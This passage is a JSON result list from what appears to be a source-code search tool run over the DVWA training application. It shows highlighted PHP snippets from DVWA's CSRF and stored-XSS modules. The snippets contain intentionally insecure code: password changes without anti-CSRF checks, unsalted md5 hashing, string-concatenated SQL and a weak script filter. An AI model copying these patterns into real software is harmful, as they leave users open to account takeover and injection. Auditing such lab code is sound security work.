class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">65:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">66:</span> \n<span class=\"highlight\"><span class=\"line-number\">67:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database</span>\n<span class=\"line-number\">68:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">69:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">70:</span> \n<span class=\"line-number\">71:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the end user\n<span class=\"line-number\">72:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>Password Changed.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 67,
"start": 62,
"end": 73,
"severity": "unknown",
"note": ""
},
{
"id": 149,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/high.php",
"filetype": "php",
"search": "\\supdate",
"match": "<span class=\"line-number\">12:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">13:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"highlight\"><span class=\"line-number\">17:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database</span>\n<span class=\"line-number\">18:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \n<span class=\"line-number\">21:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the user\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>Password Changed.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 17,
"start": 12,
"end": 23,
"severity": "unknown",
"note": ""
},
{
"id": 158,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/impossible.php",
"filetype": "php",
"search": "\\supdate",
"match": "<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> It does!\n<span class=\"line-number\">26:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">27:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">28:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">29:</span> \n<span class=\"highlight\"><span class=\"line-number\">30:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database <span class=\"token keyword\">with</span> new password</span>\n<span class=\"line-number\">31:</span> \t\t<span class=\"token variable\">$data</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$db</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span> 'UPDATE users SET password <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>password<span class=\"token punctuation\">)</span> WHERE user <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>user<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;' );</span>\n<span class=\"line-number\">32:</span> \t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':password'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">33:</span> \t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':user'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">34:</span> \t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">execute</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">35:</span> ",
"line": 30,
"start": 25,
"end": 36,
"severity": "unknown",
"note": ""
},
{
"id": 164,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/low.php",
"filetype": "php",
"search": "\\supdate",
"match": "<span class=\"line-number\">9:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">11:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">16:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the user\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>Password Changed.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 14,
"start": 9,
"end": 20,
"severity": "unknown",
"note": ""
},
{
"id": 171,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/medium.php",
"filetype": "php",
"search": "\\supdate",
"match": "<span class=\"line-number\">11:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">12:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">13:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"highlight\"><span class=\"line-number\">16:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database</span>\n<span class=\"line-number\">17:</span> \t\t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">18:</span> \t\t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \n<span class=\"line-number\">20:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the user\n<span class=\"line-number\">21:</span> \t\t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>Password Changed.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 16,
"start": 11,
"end": 22,
"severity": "unknown",
"note": ""
},
{
"id": 297,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/high.php",
"filetype": "php",
"search": "\\supdate",
"match": "<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize name input\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">preg_replace</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$name</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$name</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"highlight\"><span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> \"INSERT INTO guestbook <span class=\"token punctuation\">(</span> comment<span class=\"token punctuation\">,</span> name <span class=\"token punctuation\">)</span> VALUES <span class=\"token punctuation\">(</span> <span class=\"token string\">'$message'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'$name'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span 